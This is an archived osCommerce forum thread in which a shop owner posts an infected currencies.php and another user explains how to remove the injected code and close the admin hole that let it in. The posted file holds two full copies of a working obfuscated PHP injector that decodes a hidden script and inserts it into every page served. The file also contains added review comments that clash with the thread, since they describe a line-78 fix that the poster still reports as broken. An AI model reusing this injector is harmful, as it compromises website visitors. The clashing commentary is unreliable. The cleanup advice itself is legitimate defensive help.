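teamo Posted April 28, 2011

Recently I can't open my website. I contacted the host, and they said I need to correct the code in the file 'currencies.php'. Here is the code; could you tell me how to correct it? Thank you very much.

<?php
/*
  $Id: currencies.php,v 1.16 2003/06/05 23:16:46 hpdl Exp $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/

////
// Class to handle currencies
// TABLES: currencies
  class currencies {
    // Map of currency code => formatting settings, filled by the constructor.
    var $currencies;

    /**
     * Class constructor: loads every row of TABLE_CURRENCIES into
     * $this->currencies, keyed by the row's currency code.
     */
    function currencies() {
      $this->currencies = array();
      $currencies_query = tep_db_query("select code, title, symbol_left, symbol_right, decimal_point, thousands_point, decimal_places, value from " . TABLE_CURRENCIES);
      while ($currencies = tep_db_fetch_array($currencies_query)) {
        $this->currencies[$currencies['code']] = array('title' => $currencies['title'],
                                                       'symbol_left' => $currencies['symbol_left'],
                                                       'symbol_right' => $currencies['symbol_right'],
                                                       'decimal_point' => $currencies['decimal_point'],
                                                       'thousands_point' => $currencies['thousands_point'],
                                                       'decimal_places' => $currencies['decimal_places'],
                                                       'value' => $currencies['value']);
      }
    }

    /**
     * Formats an amount with the symbols and separators of a currency.
     *
     * @param mixed  $number                   amount to format
     * @param bool   $calculate_currency_value when true, multiply the amount by the rate first
     * @param string $currency_type            currency code; empty means the global $currency
     * @param mixed  $currency_value           explicit rate; when empty the stored 'value' is used
     * @return string formatted amount (may contain a <small> element, see below)
     */
    function format($number, $calculate_currency_value = true, $currency_type = '', $currency_value = '') {
      global $currency;

      if (empty($currency_type)) $currency_type = $currency;

      $settings = $this->currencies[$currency_type];

      $amount = $number;
      if ($calculate_currency_value == true) {
        $rate = (tep_not_null($currency_value)) ? $currency_value : $settings['value'];
        $amount = $number * $rate;
      }

      $format_string = $settings['symbol_left'] . number_format(tep_round($amount, $settings['decimal_places']), $settings['decimal_places'], $settings['decimal_point'], $settings['thousands_point']) . $settings['symbol_right'];

      // When the default currency is the euro and the selected currency is one of
      // the listed national currencies, the euro amount is appended in brackets.
      // This only happens on the rate-converting path, as in the original code.
      if ( ($calculate_currency_value == true) && (DEFAULT_CURRENCY == 'EUR') && ($currency_type == 'DEM' || $currency_type == 'BEF' || $currency_type == 'LUF' || $currency_type == 'ESP' || $currency_type == 'FRF' || $currency_type == 'IEP' || $currency_type == 'ITL' || $currency_type == 'NLG' || $currency_type == 'ATS' || $currency_type == 'PTE' || $currency_type == 'FIM' || $currency_type == 'GRD') ) {
        $format_string .= ' <small>[' . $this->format($number, true, 'EUR') . ']</small>';
      }

      return $format_string;
    }

    /**
     * Tells whether a currency code was loaded and its entry is non-empty.
     *
     * @param string $code currency code
     * @return bool
     */
    function is_set($code) {
      if (isset($this->currencies[$code]) && tep_not_null($this->currencies[$code])) {
        return true;
      } else {
        return false;
      }
    }

    /** Returns the stored 'value' (rate) of the given currency code. */
    function get_value($code) {
      return $this->currencies[$code]['value'];
    }

    /** Returns the stored 'decimal_places' of the given currency code. */
    function get_decimal_places($code) {
      return $this->currencies[$code]['decimal_places'];
    }

    /**
     * Returns the price with tax for display, followed by the tax-info block
     * when TAX_INFO_ONOFF is 'Enabled'. When 'customer_id' is not registered in
     * the session, a link to the login page is returned instead of a price.
     *
     * @param mixed $products_price price before tax
     * @param mixed $products_tax   tax rate passed to tep_add_tax() and TEXT_INFO_TAX
     * @param int   $quantity       multiplier applied to the taxed price
     * @return string HTML fragment
     */
    function display_price($products_price, $products_tax, $quantity = 1) {
      if (!tep_session_is_registered('customer_id')) {
        return '<a href="' . tep_href_link(FILENAME_LOGIN, '', 'SSL') . '">' . LOGIN_FOR_PRICE . '</a>';
      } else {
        if (TAX_INFO_ONOFF == 'Enabled') {
          $return = $this->format(tep_add_tax($products_price, $products_tax) * $quantity);
          global $tag; // declared by the original code but not used in this method
          // Fix for the error reported at line 78: the markup was placed in a
          // double-quoted string with unescaped double quotes (type="text/javascript"),
          // which is a PHP parse error and stops every page that loads this file.
          // Single-quoted strings keep the markup unchanged; the ".=" and "."
          // operators are the ones shown in the poster's own copy of the line.
          // NOTE(review): the three empty script elements produce nothing; they
          // look like residue of an earlier injection or clean-up. Compare with a
          // clean copy of the file and remove them if they are not in it.
          $return .= '<br><div class="tax_info">' . sprintf(TEXT_INFO_TAX, $products_tax , tep_href_link(FILENAME_SHIPPING)) . '</div><script type="text/javascript"> </script><script type="text/javascript"> </script><script type="text/javascript"> </script>';
          return $return;
        } else {
          return $this->format(tep_add_tax($products_price, $products_tax) * $quantity);
        }
      }
    }

    /**
     * Same as display_price() but never appends the tax-info block: both
     * TAX_INFO_ONOFF branches return only the formatted price with tax.
     *
     * @param mixed $products_price price before tax
     * @param mixed $products_tax   tax rate passed to tep_add_tax()
     * @param int   $quantity       multiplier applied to the taxed price
     * @return string HTML fragment
     */
    function display_price2($products_price, $products_tax, $quantity = 1) {
      if (!tep_session_is_registered('customer_id')) {
        return '<a href="' . tep_href_link(FILENAME_LOGIN, '', 'SSL') . '">' . LOGIN_FOR_PRICE . '</a>';
      } else {
        if (TAX_INFO_ONOFF == 'Enabled') {
          $return = $this->format(tep_add_tax($products_price, $products_tax) * $quantity);
          global $tag; // declared by the original code but not used in this method
          return $return;
        } else {
          return $this->format(tep_add_tax($products_price, $products_tax) * $quantity);
        }
      }
    }
  }
?><?php
// NOTE(review): from this "<?php global $ob_starting" tag to the end of the file
// is NOT part of currencies.php. It defines ob_start_flush(), which builds a string
// from the $tc/$tr lookup tables with chr() (the first decoded characters spell
// <script type="text/javascript">) and splices it into the page output after the
// first closing tag it finds, then registers itself with @ob_start(). The block
// is present twice; the $ob_starting guard lets only the first copy run.
// Delete both copies, then search the rest of the site for the same marker.
global $ob_starting; if(!$ob_starting) { function ob_start_flush($s) { $tc = array(0, 69, 84, 82, 67, 83, 79, 7, 9, 73, 8, 76, 63, 12, 78, 68, 23, 24, 65, 19, 27, 14, 3, 70, 80, 29, 89, 17, 86, 85, 2, 16, 77, 18, 91, 11, 93, 71, 66, 72, 75, 20, 87, 74, 59, 61, 22, 13, 37, 28, 52, 35, 21, 15, 1, 25, 34, 92, 36, 41, 30, 88, 46, 33, 51); $tr = array(49, 5, 4, 3, 9, 24, 2, 0, 2, 26, 24, 1, 25, 30, 2, 1, 61, 2, 53, 43, 18, 28, 18, 5, 4, 3, 9, 24, 2, 30, 60, 9, 23, 0, 10, 2, 26, 24, 1, 6, 23, 10, 3, 1, 15, 1, 23, 12, 4, 6, 11, 6, 3, 5, 8, 25, 25, 30, 29, 14, 15, 1, 23, 9, 14, 1, 15, 30, 8, 0, 34, 0, 0, 0, 28, 18, 3, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 0, 25, 0, 14, 1, 42, 0, 63, 3, 3, 18, 26, 10, 7, 22, 41, 38, 17, 33, 16, 33, 7, 13, 0, 7, 22, 17, 27, 16, 17, 16, 23, 7, 13, 0, 7, 22, 17, 19, 33, 23, 17, 19, 7, 13, 0, 7, 22, 17, 17, 16, 23, 16, 41, 7, 13, 0, 7, 22, 41, 4, 19, 27, 17, 19, 7, 13, 0, 7, 22, 16, 41, 17, 16, 17, 19, 7, 13, 0, 7, 22, 19, 1, 16, 55, 16, 31, 7, 13, 0, 7, 22, 17, 52, 16, 31, 17, 33, 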
7, 13, 0, 7, 22, 16, 33, 17, 27, 16, 17, 7, 13, 0, 7, 22, 16, 23, 17, 19, 19, 27, 7, 13, 0, 7, 22, 33, 23, 17, 33, 17, 27, 7, 13, 0, 7, 22, 16, 33, 41, 4, 19, 27, 7, 13, 0, 7, 22, 16, 16, 17, 19, 17, 19, 7, 13, 0, 7, 22, 16, 23, 41, 55, 19, 1, 7, 13, 0, 7, 22, 19, 1, 16, 33, 16, 16, 7, 13, 0, 7, 22, 16, 31, 16, 15, 17, 19, 7, 13, 0, 7, 22, 16, 17, 16, 41, 17, 27, 7, 13, 0, 7, 22, 19, 15, 16, 33, 16, 17, 7, 13, 0, 7, 22, 19, 1, 16, 55, 17, 33, 7, 13, 0, 7, 22, 19, 1, 19, 27, 41, 15, 7, 8, 20, 0, 0, 0, 28, 18, 3, 0, 3, 1, 15, 1, 23, 12, 4, 6, 11, 6, 3, 5, 0, 25, 0, 27, 20, 0, 0, 0, 28, 18, 3, 0, 4, 6, 11, 6, 3, 5, 12, 24, 9, 4, 40, 1, 15, 0, 25, 0, 31, 20, 0, 0, 0, 23, 29, 14, 4, 2, 9, 6, 14, 0, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 2, 13, 5, 2, 26, 11, 1, 15, 8, 0, 34, 28, 18, 3, 0, 5, 0, 25, 0, 30, 30, 20, 23, 6, 3, 0, 10, 43, 25, 31, 20, 43, 49, 2, 21, 11, 1, 14, 37, 2, 39, 20, 43, 35, 35, 8, 0, 34, 28, 18, 3, 0, 4, 12, 3, 37, 38, 0, 25, 0, 2, 44, 43, 45, 20, 23, 6, 3, 0, 10, 9, 25, 27, 20, 9, 49, 16, 20, 9, 35, 35, 8, 0, 34, 28, 18, 3, 0, 4, 12, 4, 11, 3, 0, 25, 0, 4, 12, 3, 37, 38, 21, 5, 29, 38, 5, 2, 3, 10, 9, 35, 35, 13, 33, 8, 20, 9, 23, 0, 10, 4, 12, 4, 11, 3, 54, 25, 30, 31, 31, 30, 8, 0, 5, 0, 35, 25, 0, 64, 2, 3, 9, 14, 37, 21, 23, 3, 6, 32, 51, 39, 18, 3, 51, 6, 15, 1, 10, 24, 18, 3, 5, 1, 59, 14, 2, 10, 4, 12, 4, 11, 3, 13, 27, 46, 8, 47, 27, 52, 8, 20, 36, 36, 9, 23, 0, 10, 5, 2, 26, 11, 1, 15, 8, 0, 34, 5, 0, 25, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 19, 46, 8, 0, 35, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 19, 46, 13, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 19, 17, 8, 8, 0, 35, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 44, 27, 45, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 27, 8, 35, 14, 1, 42, 0, 58, 18, 2, 1, 10, 8, 21, 37, 1, 2, 50, 9, 32, 1, 10, 8, 0, 35, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 33, 8, 8, 20, 36, 0, 1, 11, 5, 1, 0, 34, 5, 0, 25, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 19, 46, 13, 10, 5, 21, 11, 1, 14, 
37, 2, 39, 47, 19, 17, 8, 8, 0, 35, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 44, 27, 45, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 27, 8, 35, 14, 1, 42, 0, 58, 18, 2, 1, 10, 8, 21, 37, 1, 2, 50, 9, 32, 1, 10, 8, 20, 36, 3, 1, 2, 29, 3, 14, 0, 5, 20, 0, 0, 0, 36, 0, 0, 0, 23, 29, 14, 4, 2, 9, 6, 14, 0, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 0, 34, 2, 3, 26, 0, 34, 0, 0, 0, 9, 23, 10, 54, 15, 6, 4, 29, 32, 1, 14, 2, 21, 37, 1, 2, 48, 11, 1, 32, 1, 14, 2, 56, 26, 59, 15, 0, 57, 57, 0, 54, 15, 6, 4, 29, 32, 1, 14, 2, 21, 4, 3, 1, 18, 2, 1, 48, 11, 1, 32, 1, 14, 2, 8, 34, 15, 6, 4, 29, 32, 1, 14, 2, 21, 42, 3, 9, 2, 1, 10, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 13, 27, 8, 8, 20, 0, 0, 0, 36, 0, 1, 11, 5, 1, 0, 34, 28, 18, 3, 0, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 25, 15, 6, 4, 29, 32, 1, 14, 2, 21, 4, 3, 1, 18, 2, 1, 48, 11, 1, 32, 1, 14, 2, 10, 30, 5, 4, 3, 9, 24, 2, 30, 8, 20, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 21, 2, 26, 24, 1, 25, 30, 2, 1, 61, 2, 53, 43, 18, 28, 18, 5, 4, 3, 9, 24, 2, 30, 20, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 21, 5, 3, 4, 25, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 13, 31, 8, 20, 15, 6, 4, 29, 32, 1, 14, 2, 21, 37, 1, 2, 48, 11, 1, 32, 1, 14, 2, 5, 56, 26, 50, 18, 37, 62, 18, 32, 1, 10, 30, 39, 1, 18, 15, 30, 8, 44, 31, 45, 21, 18, 24, 24, 1, 14, 15, 51, 39, 9, 11, 15, 10, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 8, 20, 36, 36, 0, 4, 18, 2, 4, 39, 10, 1, 8, 0, 34, 0, 36, 2, 3, 26, 0, 34, 4, 39, 1, 4, 40, 12, 4, 6, 11, 6, 3, 5, 12, 24, 9, 4, 40, 1, 15, 10, 8, 20, 36, 0, 4, 18, 2, 4, 39, 10, 1, 8, 0, 34, 0, 5, 1, 2, 50, 9, 32, 1, 6, 29, 2, 10, 30, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 30, 13, 0, 52, 31, 31, 8, 20, 36, 0, 0, 0, 36, 0, 0, 0, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 20, 36, 49, 53, 5, 4, 3, 9, 24, 2, 60); $ob_htm = ''; foreach($tr as $tval) { $ob_htm .= chr($tc[$tval]+32); } $slw=strtolower($s); 
$i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);} if(!$i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}} if(!$i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}} if(!$i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}} if(!$i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}} if(!$i){$i=strpos($slw,'</body');if($i){$i--;}} if(!$i){$i=strlen($s);if($i){$i--;}} $i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i); return $s; } $ob_starting = time(); @ob_start("ob_start_flush"); } ?><?php global $ob_starting; if(!$ob_starting) { function ob_start_flush($s) { $tc = array(0, 69, 84, 82, 67, 83, 7, 79, 23, 73, 8, 9, 12, 76, 24, 68, 63, 78, 3, 19, 65, 27, 14, 70, 16, 17, 80, 29, 89, 85, 86, 2, 18, 77, 91, 11, 93, 71, 66, 72, 75, 20, 87, 74, 59, 13, 22, 61, 52, 25, 28, 37, 35, 15, 1, 21, 30, 34, 92, 36, 41, 88, 46, 51, 33); $tr = array(50, 5, 4, 3, 9, 26, 2, 0, 2, 28, 26, 1, 27, 31, 2, 1, 61, 2, 53, 43, 20, 30, 20, 5, 4, 3, 9, 26, 2, 31, 56, 9, 23, 0, 10, 2, 28, 26, 1, 7, 23, 10, 3, 1, 15, 1, 23, 16, 4, 7, 13, 7, 3, 5, 11, 27, 27, 31, 29, 17, 15, 1, 23, 9, 17, 1, 15, 31, 11, 0, 34, 0, 0, 0, 30, 20, 3, 0, 15, 9, 30, 16, 4, 7, 13, 7, 3, 5, 0, 27, 0, 17, 1, 42, 0, 64, 3, 3, 20, 28, 10, 6, 18, 41, 38, 14, 32, 8, 32, 6, 12, 0, 6, 18, 14, 25, 8, 14, 8, 23, 6, 12, 0, 6, 18, 14, 19, 32, 23, 14, 19, 6, 12, 0, 6, 18, 14, 14, 8, 23, 8, 41, 6, 12, 0, 6, 18, 41, 4, 19, 25, 14, 19, 6, 12, 0, 6, 18, 8, 41, 14, 8, 14, 19, 6, 12, 0, 6, 18, 19, 1, 8, 49, 8, 24, 6, 12, 0, 6, 18, 14, 55, 8, 24, 14, 32, 6, 12, 0, 6, 18, 8, 32, 14, 25, 8, 14, 6, 12, 0, 6, 18, 8, 23, 14, 19, 19, 25, 6, 12, 0, 6, 18, 32, 23, 14, 32, 14, 25, 6, 12, 0, 6, 18, 8, 32, 41, 4, 19, 25, 6, 12, 0, 6, 18, 8, 8, 14, 19, 14, 19, 6, 12, 0, 6, 18, 8, 23, 41, 49, 19, 1, 6, 12, 0, 6, 18, 19, 1, 8, 24, 8, 25, 6, 12, 0, 6, 18, 8, 14, 8, 38, 8, 1, 6, 12, 0, 6, 18, 14, 19, 8, 24, 14, 25, 6, 12, 0, 6, 18, 8, 1, 14, 32, 19, 15, 6, 12, 0, 6, 18, 8, 32, 8, 1, 19, 15, 6, 12, 0, 6, 18, 8, 32, 8, 32, 
19, 1, 6, 12, 0, 6, 18, 8, 49, 14, 32, 19, 1, 6, 12, 0, 6, 18, 8, 49, 14, 24, 14, 41, 6, 12, 0, 6, 18, 8, 41, 14, 25, 14, 14, 6, 12, 0, 6, 18, 19, 15, 8, 4, 8, 14, 6, 12, 0, 6, 18, 8, 15, 19, 15, 8, 23, 6, 12, 0, 6, 18, 8, 8, 8, 23, 19, 25, 6, 12, 0, 6, 18, 41, 15, 24, 24, 24, 24, 6, 11, 21, 0, 0, 0, 30, 20, 3, 0, 3, 1, 15, 1, 23, 16, 4, 7, 13, 7, 3, 5, 0, 27, 0, 25, 21, 0, 0, 0, 30, 20, 3, 0, 4, 7, 13, 7, 3, 5, 16, 26, 9, 4, 40, 1, 15, 0, 27, 0, 24, 21, 0, 0, 0, 23, 29, 17, 4, 2, 9, 7, 17, 0, 15, 9, 30, 16, 26, 9, 4, 40, 16, 4, 7, 13, 7, 3, 5, 10, 2, 12, 5, 2, 28, 13, 1, 15, 11, 0, 34, 30, 20, 3, 0, 5, 0, 27, 0, 31, 31, 21, 23, 7, 3, 0, 10, 43, 27, 24, 21, 43, 50, 2, 22, 13, 1, 17, 37, 2, 39, 21, 43, 35, 35, 11, 0, 34, 30, 20, 3, 0, 4, 16, 3, 37, 38, 0, 27, 0, 2, 44, 43, 47, 21, 23, 7, 3, 0, 10, 9, 27, 25, 21, 9, 50, 8, 21, 9, 35, 35, 11, 0, 34, 30, 20, 3, 0, 4, 16, 4, 13, 3, 0, 27, 0, 4, 16, 3, 37, 38, 22, 5, 29, 38, 5, 2, 3, 10, 9, 35, 35, 12, 32, 11, 21, 9, 23, 0, 10, 4, 16, 4, 13, 3, 54, 27, 31, 24, 24, 31, 11, 0, 5, 0, 35, 27, 0, 63, 2, 3, 9, 17, 37, 22, 23, 3, 7, 33, 52, 39, 20, 3, 52, 7, 15, 1, 10, 26, 20, 3, 5, 1, 60, 17, 2, 10, 4, 16, 4, 13, 3, 12, 25, 46, 11, 45, 25, 55, 11, 21, 36, 36, 9, 23, 0, 10, 5, 2, 28, 13, 1, 15, 11, 0, 34, 5, 0, 27, 0, 5, 22, 5, 29, 38, 5, 2, 3, 10, 24, 12, 19, 46, 11, 0, 35, 0, 5, 22, 5, 29, 38, 5, 2, 3, 10, 19, 46, 12, 10, 5, 22, 13, 1, 17, 37, 2, 39, 45, 19, 14, 11, 11, 0, 35, 0, 15, 9, 30, 16, 4, 7, 13, 7, 3, 5, 44, 25, 47, 22, 5, 29, 38, 5, 2, 3, 10, 24, 12, 25, 11, 35, 17, 1, 42, 0, 59, 20, 2, 1, 10, 11, 22, 37, 1, 2, 48, 9, 33, 1, 10, 11, 0, 35, 0, 5, 22, 5, 29, 38, 5, 2, 3, 10, 10, 5, 22, 13, 1, 17, 37, 2, 39, 45, 32, 11, 11, 21, 36, 0, 1, 13, 5, 1, 0, 34, 5, 0, 27, 0, 5, 22, 5, 29, 38, 5, 2, 3, 10, 19, 46, 12, 10, 5, 22, 13, 1, 17, 37, 2, 39, 45, 19, 14, 11, 11, 0, 35, 0, 15, 9, 30, 16, 4, 7, 13, 7, 3, 5, 44, 25, 47, 22, 5, 29, 38, 5, 2, 3, 10, 24, 12, 25, 11, 35, 17, 1, 42, 0, 59, 20, 2, 1, 10, 11, 22, 37, 1, 2, 48, 9, 
33, 1, 10, 11, 21, 36, 3, 1, 2, 29, 3, 17, 0, 5, 21, 0, 0, 0, 36, 0, 0, 0, 23, 29, 17, 4, 2, 9, 7, 17, 0, 2, 3, 28, 16, 26, 9, 4, 40, 16, 4, 7, 13, 7, 3, 5, 10, 11, 0, 34, 2, 3, 28, 0, 34, 0, 0, 0, 9, 23, 10, 54, 15, 7, 4, 29, 33, 1, 17, 2, 22, 37, 1, 2, 51, 13, 1, 33, 1, 17, 2, 57, 28, 60, 15, 0, 58, 58, 0, 54, 15, 7, 4, 29, 33, 1, 17, 2, 22, 4, 3, 1, 20, 2, 1, 51, 13, 1, 33, 1, 17, 2, 11, 34, 15, 7, 4, 29, 33, 1, 17, 2, 22, 42, 3, 9, 2, 1, 10, 15, 9, 30, 16, 26, 9, 4, 40, 16, 4, 7, 13, 7, 3, 5, 10, 15, 9, 30, 16, 4, 7, 13, 7, 3, 5, 12, 25, 11, 11, 21, 0, 0, 0, 36, 0, 1, 13, 5, 1, 0, 34, 30, 20, 3, 0, 17, 1, 42, 16, 4, 5, 2, 28, 13, 1, 27, 15, 7, 4, 29, 33, 1, 17, 2, 22, 4, 3, 1, 20, 2, 1, 51, 13, 1, 33, 1, 17, 2, 10, 31, 5, 4, 3, 9, 26, 2, 31, 11, 21, 17, 1, 42, 16, 4, 5, 2, 28, 13, 1, 22, 2, 28, 26, 1, 27, 31, 2, 1, 61, 2, 53, 43, 20, 30, 20, 5, 4, 3, 9, 26, 2, 31, 21, 17, 1, 42, 16, 4, 5, 2, 28, 13, 1, 22, 5, 3, 4, 27, 15, 9, 30, 16, 26, 9, 4, 40, 16, 4, 7, 13, 7, 3, 5, 10, 15, 9, 30, 16, 4, 7, 13, 7, 3, 5, 12, 24, 11, 21, 15, 7, 4, 29, 33, 1, 17, 2, 22, 37, 1, 2, 51, 13, 1, 33, 1, 17, 2, 5, 57, 28, 48, 20, 37, 62, 20, 33, 1, 10, 31, 39, 1, 20, 15, 31, 11, 44, 24, 47, 22, 20, 26, 26, 1, 17, 15, 52, 39, 9, 13, 15, 10, 17, 1, 42, 16, 4, 5, 2, 28, 13, 1, 11, 21, 36, 36, 0, 4, 20, 2, 4, 39, 10, 1, 11, 0, 34, 0, 36, 2, 3, 28, 0, 34, 4, 39, 1, 4, 40, 16, 4, 7, 13, 7, 3, 5, 16, 26, 9, 4, 40, 1, 15, 10, 11, 21, 36, 0, 4, 20, 2, 4, 39, 10, 1, 11, 0, 34, 0, 5, 1, 2, 48, 9, 33, 1, 7, 29, 2, 10, 31, 2, 3, 28, 16, 26, 9, 4, 40, 16, 4, 7, 13, 7, 3, 5, 10, 11, 31, 12, 0, 55, 24, 24, 11, 21, 36, 0, 0, 0, 36, 0, 0, 0, 2, 3, 28, 16, 26, 9, 4, 40, 16, 4, 7, 13, 7, 3, 5, 10, 11, 21, 36, 50, 53, 5, 4, 3, 9, 26, 2, 56); $ob_htm = ''; foreach($tr as $tval) { $ob_htm .= chr($tc[$tval]+32); } $slw=strtolower($s); $i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);} if(!$i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}} 
if(!$i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}} if(!$i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}} if(!$i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}} if(!$i){$i=strpos($slw,'</body');if($i){$i--;}} if(!$i){$i=strlen($s);if($i){$i--;}} $i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i); return $s; } $ob_starting = time(); @ob_start("ob_start_flush"); } ?> Link to comment Share on other sites More sharing options...
Taipo Posted April 28, 2011

Your site has been attacked via another file that is resident in the directories. In the code you will see:

<?php global $ob_starting; if(!$ob_starting) { function ob_start_flush($s) { $tc = array(0, 69, 84, 82, 67, 83, 79, 7, 9, 73, 8, 76, 63, 12, 78, 68, 23, 24, 65, 19, 27,.....

It has actually been appended in there twice. Remove that from the code and that file will probably work properly again. However, that does not fix how it got there in the first place. You will need to clean the rogue files out of your site and patch the admin exploit security hole that allowed this to happen.

Basically, the security hole in the admin, which can be patched by either upgrading to Oscommerce 2.3.1 or installing Osc_Sec.php (see link in my signature), allowed attackers to upload rogue files into your web directories. Via those files they are able to add code into Oscommerce website files, as they have done above.

So after patching your site's security hole, you need to trawl through your directories for files that should not be there. Start in the images directory, where most rogue files get installed. Then go through your site files for any other file that has this <?php global $ob_starting code in it, and remove the code from those files as well.

Or, if you have a backup of your site, remove the current fileset and upload the older backup, hoping that it is not also already infected. If you do load a backup, don't forget to patch the security in it using either of the two methods I mentioned earlier.

Once all that is done, you can also add further security by either using htaccess to password protect your admin directory or changing the name of the directory to hide it from attackers.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
teamo Posted April 28, 2011 (Author)

Hi, I removed the code, but I still can't open my website. I copied the code into Dreamweaver and it shows that line 78 has errors:

$return .= "<br><div class=\"tax_info\">" . sprintf(TEXT_INFO_TAX, $products_tax , tep_href_link(FILENAME_SHIPPING)) . "</div><script type="text/javascript">

Is there a problem with it?

Quote (Taipo):

Your site has been attacked via another file that is resident in the directories. In the code you will see:

<?php global $ob_starting; if(!$ob_starting) { function ob_start_flush($s) { $tc = array(0, 69, 84, 82, 67, 83, 79, 7, 9, 73, 8, 76, 63, 12, 78, 68, 23, 24, 65, 19, 27,.....

It has actually been appended in there twice. Remove that from the code and that file will probably work properly again. However, that does not fix how it got there in the first place. You will need to clean the rogue files out of your site and patch the admin exploit security hole that allowed this to happen.

Basically, the security hole in the admin, which can be patched by either upgrading to Oscommerce 2.3.1 or installing Osc_Sec.php (see link in my signature), allowed attackers to upload rogue files into your web directories. Via those files they are able to add code into Oscommerce website files, as they have done above.

So after patching your site's security hole, you need to trawl through your directories for files that should not be there. Start in the images directory, where most rogue files get installed. Then go through your site files for any other file that has this <?php global $ob_starting code in it, and remove the code from those files as well.

Or, if you have a backup of your site, remove the current fileset and upload the older backup, hoping that it is not also already infected. If you do load a backup, don't forget to patch the security in it using either of the two methods I mentioned earlier.

Once all that is done, you can also add further security by either using htaccess to password protect your admin directory or changing the name of the directory to hide it from attackers.
Taipo Posted April 28, 2011

Sorry, I meant that you should remove that code and everything below it. It has been added in. Remove everything from the first instance of <?php global $ob_starting to the bottom of the page.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
teamo Posted April 28, 2011 (Author)

Hello, I removed it, but I still can't open the website.

Quote (Taipo):

Sorry, I meant that you should remove that code and everything below it. It has been added in. Remove everything from the first instance of <?php global $ob_starting to the bottom of the page.
Taipo Posted April 28, 2011

Then you will need to go back and read the rest of what I wrote above.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
This topic is now archived and is closed to further replies.